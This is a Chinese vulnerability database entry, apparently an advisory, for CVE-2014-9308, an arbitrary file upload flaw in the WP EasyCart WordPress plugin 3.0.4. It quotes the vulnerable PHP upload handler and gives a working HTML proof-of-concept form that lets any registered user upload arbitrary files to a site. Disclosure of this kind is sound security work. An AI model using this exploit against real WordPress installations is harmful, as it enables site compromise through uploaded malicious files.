WordPress Shopping Cart 3.0.4 --任意文件上传

基本字段

漏洞编号：: SSV-89276

披露/发现时间：: 2015-01-15

提交时间：: 2015-08-31

漏洞等级：

漏洞类别：: 文件上传

影响组件：: WordPress
(=3.0.4)

漏洞作者：: 未知

提交者：: 匿名

CVE-ID：: CVE-2014-9308

CNNVD-ID：: CNNVD-201501-238

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

漏洞详情

贡献者匿名共获得 0.95KB

# 受影响版本: WordPress Shopping Cart 3.0.4 # 日期: 29-10-2014# 软件链接: <a href="https://wordpress.org/plugins/wp-easycart/" rel="nofollow">https://wordpress.org/plugins/wp-easycart/</a># CVE: CVE-2014-9308# 类别: 应用程序漏洞详情：任何注册用户都可以上传任何文件。 上传点: wp-easycart\inc\amfphp\administration\banneruploaderscript.php $date = $_POST['datemd5'];$usersqlquery = sprintf("SELECT  ec_user.*, ec_role.admin_access FROM  ec_user  LEFT JOIN ec_role ON (ec_user.user_level = ec_role.role_label) WHERE  ec_user.password = '%s' AND  (ec_user.user_level = 'admin' OR ec_role.admin_access = 1)", mysql_real_escape_string($requestID));$userresult = mysql_query($usersqlquery);$users = mysql_fetch_assoc($userresult);if ($users || is_user_logged_in()) { $filename = $_FILES['Filedata']['name']; $filetmpname = $_FILES['Filedata']['tmp_name']; $fileType = $_FILES["Filedata"]["type"]; $fileSizeMB = ($_FILES["Filedata"]["size"] / 1024 / 1000); $explodedfilename = pathinfo($filename); $nameoffile = $explodedfilename['filename']; $fileextension = $explodedfilename['extension']; move_uploaded_file($_FILES['Filedata']['tmp_name'], "../../../products/banners/".$nameoffile."_".$date.".".$fileextension);} 验证： Login as regular user (created using wp-login.php?action=register): <form action="http://wordpress-install/wp-content/plugins/wp-easycart/inc/amfphp/administration/banneruploaderscript.php" method="post" enctype="multipart/form-data"> <input type="hidden" name="datemd5" value="1"> <input type="file" name="Filedata"> <input value="Upload!" type="submit"> </form> File will be visible: http://wordpress-install/wp-content/plugins/wp-easycart/products/banners/%filename%_1.%fileextension%